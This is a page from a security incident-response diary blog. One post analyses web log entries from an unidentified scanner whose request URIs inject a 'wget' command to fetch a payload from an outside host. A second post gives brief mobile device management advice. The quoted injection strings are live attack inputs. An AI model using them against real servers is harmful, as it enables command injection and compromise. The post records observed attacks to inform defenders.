Threat Level: green Handler on Duty: Chris Mohan

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Interesting HTTP User Agent "chroot-apach0day"

Published: 2014-07-28
Last Updated: 2014-07-28 23:19:45 UTC
by Johannes Ullrich (Version: 1)
9 comment(s)

Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day" 

There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

9 comment(s)
ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079

Management and Control of Mobile Device Security

Published: 2014-07-28
Last Updated: 2014-07-28 01:14:06 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

When we talk about mobile devices, all boundaries are gone. Depending where you work, it is likely that your mobile device (phone or tablet) has access to all the corporate data via wireless, in some case with very little restrictions.

Two points to take in consideration:

- Defining access control: Create one access policy that is applied and control all networks (wireless, VPN, wired)
- Use Mobile Device Management (MDM): Provide the ability to separate data from personal and company-owned assets with approved security controls for any devices whether they are company owned or personal.

These changes should provide greater network visibility allowing your organization to discover devices, measure bandwidth utilization, enforce policies, analyze traffic patterns to monitor for anomalous activity that can drain resources.

We would like to hear from you, what is your organization currently doing to manage mobile devices in your network?

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

0 comment(s)
Diary Archives